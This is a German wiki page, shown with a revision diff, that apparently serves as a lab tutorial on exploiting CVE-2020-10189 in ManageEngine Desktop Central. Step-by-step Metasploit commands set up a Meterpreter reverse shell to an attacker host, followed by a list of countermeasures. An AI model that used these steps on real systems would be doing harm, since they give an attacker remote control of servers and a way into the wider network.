Manager Central Schwachstelle: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 9: Zeile 9:
 
=== Schritte zur Ausnutzung ===
 
=== Schritte zur Ausnutzung ===
  
# Starte die Metasploit-Konsole:
+
*Starte die Metasploit-Konsole:
 
   msfconsole
 
   msfconsole
  
# Wähle das Exploit-Modul für die Java-Deserialisierung:
+
*Wähle das Exploit-Modul für die Java-Deserialisierung:
 
   use exploit/windows/http/desktopcentral_deserialization
 
   use exploit/windows/http/desktopcentral_deserialization
  
# Setze die Optionen für das Zielsystem und die Payload:
+
*Setze die Optionen für das Zielsystem und die Payload:
 
   set RHOSTS 10.0.10.107  # Ziel-IP-Adresse   
 
   set RHOSTS 10.0.10.107  # Ziel-IP-Adresse   
 
   set RPORT 8022          # Ziel-Port   
 
   set RPORT 8022          # Ziel-Port   
Zeile 22: Zeile 22:
 
   set PAYLOAD windows/meterpreter/reverse_tcp  # Payload-Typ   
 
   set PAYLOAD windows/meterpreter/reverse_tcp  # Payload-Typ   
  
# Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind:
+
*Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind:
 
   show options
 
   show options
  
# Führe den Exploit aus:
+
*Führe den Exploit aus:
 
   exploit
 
   exploit
  
# Überprüfe die Verbindung:   
+
*Überprüfe die Verbindung:   
 
Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.
 
Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.
  

Version vom 28. August 2024, 16:09 Uhr

Details zur Schwachstelle: ManageEngine Desktop Central Java Deserialization (CVE-2020-10189)

Schwachstelle: Unsichere Java-Deserialisierung in ManageEngine Desktop Central ermöglicht einem Angreifer Remote Code Execution (RCE). Diese Schwachstelle erlaubt es, speziell gestaltete Java-Objekte zu senden, die deserialisiert und ausgeführt werden, was zur Ausführung beliebigen Codes führt.

Angriffspunkt: Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central. Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, die unsichere Java-Deserialisierung auslösen.

Ausnutzung: Ein Angreifer kann ein speziell entwickeltes Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten.

Schritte zur Ausnutzung

  • Starte die Metasploit-Konsole:
 msfconsole
  • Wähle das Exploit-Modul für die Java-Deserialisierung:
 use exploit/windows/http/desktopcentral_deserialization
  • Setze die Optionen für das Zielsystem und die Payload:
 set RHOSTS 10.0.10.107   # Ziel-IP-Adresse  
 set RPORT 8022           # Ziel-Port  
 set LHOST 10.0.10.101    # Angreifer-IP-Adresse für die Reverse-Shell  
 set LPORT 4444           # Lokaler Port für die Verbindung  
 set PAYLOAD windows/meterpreter/reverse_tcp  # Payload-Typ  
  • Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind:
 show options
  • Führe den Exploit aus:
 exploit
  • Überprüfe die Verbindung:

Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.

Warum ist diese Schwachstelle gefährlich?

  • Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
  • Weitreichende Auswirkungen: Volle Kompromittierung des Servers und möglicherweise weitere Netzwerkinfektion.
  • Angriff auf ungeschützte Versionen: Ungepatchte Versionen von ManageEngine Desktop Central sind gefährdet.

Gegenmaßnahmen

  • Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
  • Verwende Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS), um bösartige Anfragen zu blockieren.
  • Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.